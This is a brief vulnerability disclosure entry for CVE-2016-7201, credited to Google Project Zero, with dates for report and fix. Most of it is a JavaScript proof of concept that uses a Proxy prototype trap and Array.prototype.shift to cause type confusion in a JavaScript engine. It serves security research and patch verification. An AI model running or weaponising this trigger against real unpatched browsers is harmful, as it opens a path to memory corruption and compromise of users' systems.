CVE-2016-7201

  • Report: Sep 2016
  • Fix: Nov 2016
  • Credit: Natalie Silvanovich, Google Project Zero

PoC

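// Array of integer values; the proxy below reports it as its prototype.
var a = new Array(0x11111111, 0x22222222, 0x33333333, 0x44444444, 0x12121212, 0x23232323, 0x12345670, 0x7777);

// getPrototypeOf trap: any prototype lookup on the proxy returns `a`.
var handler = {
    getPrototypeOf: function(target, name){
        return a;
    }
};

var p = new Proxy([], handler);
// Array holding an object, an array and a string.
var b = [{}, [], "natalie"];

// Put the proxy on b's prototype chain, then extend b so index 3 has no own element.
b.__proto__ = p;
b.length = 4;

// Array.prototype.shift invoked with b as the receiver.
a.shift.call(b);
// b[2] is type confused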

Reference